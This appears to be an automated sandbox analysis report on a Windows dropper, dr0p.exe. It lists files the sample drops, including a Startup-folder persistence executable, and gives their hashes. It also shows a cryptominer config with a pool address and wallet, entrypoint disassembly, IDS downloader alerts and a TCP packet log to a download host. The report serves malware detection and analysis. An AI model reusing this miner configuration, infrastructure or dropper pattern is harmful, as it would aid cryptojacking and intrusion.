Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........Desktop.@............................................D.e.s.k.t.o.p.....V.2...........mh1.exe.@............................................m.h.1...e.x.e.......$.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.m.h.1...e.x.e...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.e.s.k.t.o.p.........:..,.LB.)...A-...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Download File

Process:	C:\Users\user\Desktop\dr0p.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1916354
Entropy (8bit):	7.842622495315013
Encrypted:	false
SSDEEP:	24576:xuDXTIGaPhEYzUzA0/0VEwkpYLC62mB4m4GwotowWEtGGI3L1FS8fbvOU4bMEkRp:kDjlabwz9pf62mBUwPBI3J5yUiMnb
MD5:	287EEBE03B7EC7488ED2AE07A5E98CF0
SHA1:	51E50499BCAFA71D3B2A2053E89C002F8FADF35F
SHA-256:	471233B92FFC3E248961F5B27106BDF0EE5B6DBC9E2E2137D482F2C88A817DD6
SHA-512:	E9EE32EDEE6792254A93D12FAB838D66CAE39CF10B26DDE5463F23E1ECB6AA10E87FB97B2DFC4C7B3D9E4F75449C6F5A08254874F2F53D6C71A000AF56770963
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...8.................@..........................................`.............................................4......P.......`.......l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...`...........................@..@.reloc..p...........................@..B........................................................................................................................................

C:\Users\user\Desktop\hm.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4109824
Entropy (8bit):	6.282561549846907
Encrypted:	false
SSDEEP:	49152:A+W0qUi3UHScrb/THvO90d7HjmAFd4A64nsfJRsjcaH7ALfSadLLfrXHz8LbHpD5:Y32S4j1cE/oOX
MD5:	692D72923747BE1ED2C05CD6B4118BF4
SHA1:	046050976D2FA16CF25E10F4895011E066414B0E
SHA-256:	C035C371F1AD9A96B51F28FBE9E6F7A402BF10CD1CA2D82AABBC78BA07C7703F
SHA-512:	8C6780FE09F701AC3FA5F397A4AA88475B5E26E19621D66B7404C720DF87E31A692004DEE672CF76CF6327421C1AA2A14B1F09EB6933C2AAA8E74F2FEF116548
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: x11.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........................!...>...............@...............................D......'?...`... .......................................D......D...............>..............PD.,m..........................`.=.(...................0.D..............................text.....!.......!.................`.``.data.........!.......!.............@.`..rdata...\|....#..\|...p#.............@.`@.pdata........>.......=.............@.0@.xdata..D....0>.......>.............@.0@.bss....D....P>.......................`..edata.......D......&>.............@.0@.idata........D......(>.............@.@..CRT....h....0D......D>.............@.@..tls.........@D......F>.............@.@..reloc..,m...PD..n...H>.............@.0B........................................................................................................................................................................

C:\Users\user\Desktop\poolworker.config.ini

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.062923866267036
Encrypted:	false
SSDEEP:	3:GRLY/QMX8VovVRCotDM3Udm+OHLyovCuUkjvn:8aXsVodREU7OHLyLuUkjvn
MD5:	E545F3FE68CC1D87F928EF957A8F1FC8
SHA1:	CAA3A5FDD3A74B9BDE10FB62980CB104BB23D494
SHA-256:	08EFBA46CB950F5787F3CB0B36A853362863152175FC23B14ED4FA3783766A2C
SHA-512:	93A40AD2E3C8A829734B0AA272B4E7025C11601BC17330EE1B7E99A476E7C78957222097B443CC3EC348E45F51CA6AA672919949BCE015EA8F69DE4901035823
Malicious:	false
Preview:	..pool = 23.27.53.27:80....rewards = 1D4T3dTQ5iQaae1xGbWGvWnUBsTEyD2YVj....supervene = 16......

C:\Users\user\Desktop\q.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	6.324195405707001
Encrypted:	false
SSDEEP:	3072:AbcifhHdZsBvOLvrWy9RpRifq3c0X9Z7GOQ9sreBJK:Ad5vrWYRpRifq3BX9NGO+TJ
MD5:	935809D393A2BF9F0E886A41FF5B98BE
SHA1:	1ED3FC1669115B309624480E88C924B7B67E73BB
SHA-256:	C92904610319843578ADA35FB483D219B0D07DA69179D57C7E1223CAB078492C
SHA-512:	46BCCAABA4B8B4CFA247F48B55998D13B37F714AC69F6B08A97B6B8075F61233545406BC9F8DB7D2848F1831EEB506DA650B72D7D3A2F624E51ECCD5FC537BC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......<..........................................@.............................................. ......................i....p..................................d............................`.......................................................text............................... ..`.data............l..................@....tls.........P......................@....rdata.......`......................@..P.idata.......p......................@..@.edata..............................@..@

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\q.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.662215960473421
Encrypted:	false
SSDEEP:	3:n+jzsmsNvNPF9lT3eRFcXMJFPoodAWWFWuS05v:nusNVPF9lT3e4cJFQWzWFWO5v
MD5:	8FBDE19EC4447B98F3EF9B2F15889FC9
SHA1:	BA4223237F41AE989606B270295ACF78BA1EBD9D
SHA-256:	7DA4EC2D16BD371D3CA43351D6D4DB06F9CC4E8636DA117CF5B6C8D249D5ACDD
SHA-512:	4D9C2DD50564510BF15076B42FC1DF8D165963ED0A0B548A456570DECFD53AA6DD95B9CA5A01CB447BC0F821460057C3B2162E2C1C7D6136B51FDA8674AC1344
Malicious:	false
Preview:	..Quiet V01.01.00cpp Joe Richards (joe@joeware.net) April 2002....Process spawned.......

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.362484156293919
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	dr0p.exe
File size:	602 bytes
MD5:	d085f244d635d6e43546e63649ea2e67
SHA1:	52dcf3734c43becb6d66e399186b760da511c19a
SHA256:	d40b523a10b6a72a37b9ee419f6a1d38403d1a8676ceddb3186ec85289ad1f29
SHA512:	c6097a3bd5181497befb6e6da921d889030750c5353528245aa13d6905c2c7700f0198b0cd0e1fa00cd91a6ea890d947c8d5f46f1cc9d34dafd0ad024b2a40e8
SSDEEP:	12:6zsqdaqPEP8gz0ayKc2uZ677/Lc7kj3czCyRbCh:6wClPMr0aU2d7wkTcRuh
TLSH:	2AF00C504A2272EA9A21EA615581CF6021AD522925406126CA6271A0BA80C17CCB33C0
File Content Preview:	MZ23PE..L.....-..@...E.,......`....2.ukNO1..d.....r.u..Z..@.............y.....P=.....w..0...Z\|......S...B.j.X1...Wj.Yj.=....j...utL..`..1...t$(N..au.@B..r.........F9........V$=....t..F ....aK..r.u.[f..........Z9.r..).).....G......e.\...0.....g....q...].>G

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400064
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:	0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	49153
OS Version Minor:	49285
File Version Major:	49153
File Version Minor:	49285
Subsystem Version Major:	49153
Subsystem Version Minor:	49285
Import Hash:

Entrypoint Preview

Instruction
push ebx
mov edi, 00420000h
push 00000001h
pop eax
xor ebp, ebp
add esi, esi
push edi
push 00000008h
pop ecx
push 00000004h
cmp eax, 00000000h
push 00000005h
mov edx, 4C7475DFh
mov bl, 1Fh
pushad
add al, 00h
xor eax, eax
cdq
mov esi, dword ptr [esp+28h]
dec esi
jmp 00007F47210D30DEh
popad
jne 00007F47210D3160h
inc eax
inc edx
ror byte ptr [esi], cl
jc 00007F47210D3156h
shr edx, 1
jmp 00007F47210D3154h
shr eax, 1
rol byte ptr [esi], cl
inc esi
cmp edi, esi
jnle 00007F47210D313Ah
mov cl, 04h
mov esi, esp
add dword ptr [esi+24h], edx
cmp eax, 00000000h
je 00007F47210D3157h
add dword ptr [esi+20h], eax
test edx, edx
loope 00007F47210D3141h
popad
dec ebx
add edx, edx
jc 00007F47210D3114h
jne 00007F47210D314Bh
pop ebx
cmp di, 0217h
jmp 00007F47210D30E1h
mul edx
div ebx
pop edx
cmp esi, eax
jc 00007F47210D3157h
xchg eax, edx
sub esi, edx
sub eax, edx
rcl byte ptr [edi], 1
loop 00007F47210D30E8h
inc edi
jmp 00007F47210D30E2h
mov al, byte ptr [6508D0C4h]
or dword ptr [ecx+edx*4-2Ch], ebx
loope 00007F47210D3182h
sbb eax, E8E3D988h
scasd
xchg eax, edx
xchg eax, edx
out dx, al
jno 00007F47210D30F2h
loop 00007F47210D3120h
pop ebp
lodsd
inc edi
mov cx, seg?
inc ecx
les eax, fword ptr [ebx]
cwde
adc ecx, edx
cdq
call far 93DAh : 0AC43E7Fh
xchg eax, ecx
test dword ptr [edx-2Dh], edi
clc
cmpsd

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T06:03:58.177534+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49709	23.27.51.244	80	TCP
2025-01-06T06:03:58.177534+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	49709	23.27.51.244	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 06:03:57.668627024 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:57.673563957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:57.673630953 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:57.674489975 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:57.679231882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177469969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177490950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177501917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177511930 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177524090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177534103 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.177536011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177547932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177566051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.177598000 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.177658081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177669048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177679062 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.177686930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.177711964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.182389021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.182430029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.182444096 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.182468891 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.182600975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.182630062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.268134117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.268146992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.268157959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.268167973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.268178940 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.268210888 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.272855043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.272866964 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.272877932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.272900105 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.272912025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.272922039 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.272947073 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.277631998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.277656078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.277666092 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.277676105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.277674913 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.277684927 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.277695894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.277721882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.282382011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.282396078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.282407045 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.282416105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.282430887 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.282459021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.287156105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.287175894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.287188053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.287199020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.287199974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.287209034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.287228107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.287249088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.291829109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.291842937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.291878939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.291907072 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.358854055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.358871937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.358882904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.358895063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.358916998 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.358974934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.363518953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.363532066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.363579988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.363765955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.363778114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.363822937 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.368231058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.368243933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.368259907 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.368280888 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.368319988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.368474960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.368489027 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.368520975 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.368551970 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.373074055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.373087883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.373097897 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.373117924 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.373138905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.373151064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.373162985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.373194933 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.377816916 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.377830982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.377862930 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.377867937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.377878904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.377882957 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.377888918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.377892017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.377917051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.377928972 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382499933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382512093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382561922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382649899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382661104 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382671118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382682085 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382692099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382699013 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382734060 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382805109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382814884 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382829905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382841110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382850885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382853031 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382860899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382868052 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382870913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382883072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382891893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382898092 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382903099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382914066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382921934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382925034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382935047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382940054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382946014 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382955074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382972002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382972956 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.382983923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.382986069 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.383002043 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.383018017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449374914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449387074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449398041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449408054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449419022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449420929 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449453115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449476004 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449652910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449701071 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449713945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449723959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449749947 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449769020 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449780941 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449790001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449807882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.449824095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.449860096 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.450721025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450732946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450742960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450767994 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.450779915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450790882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450800896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.450808048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.450808048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.450835943 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.451603889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451647043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451657057 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451664925 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.451710939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.451710939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.451745033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451755047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451765060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.451780081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.451803923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.452656984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452667952 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452677965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452702999 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.452707052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452718973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452729940 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.452737093 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.452761889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.452784061 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.453617096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453627110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453639030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453661919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.453691006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453696966 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.453701973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453713894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.453732014 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.453756094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.454531908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454550982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454560995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454581022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.454611063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.454683065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454694033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454729080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.454771996 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.454809904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.455483913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455502033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455518007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.455529928 CET	49709	80	192.168.2.6	23.27.51.244
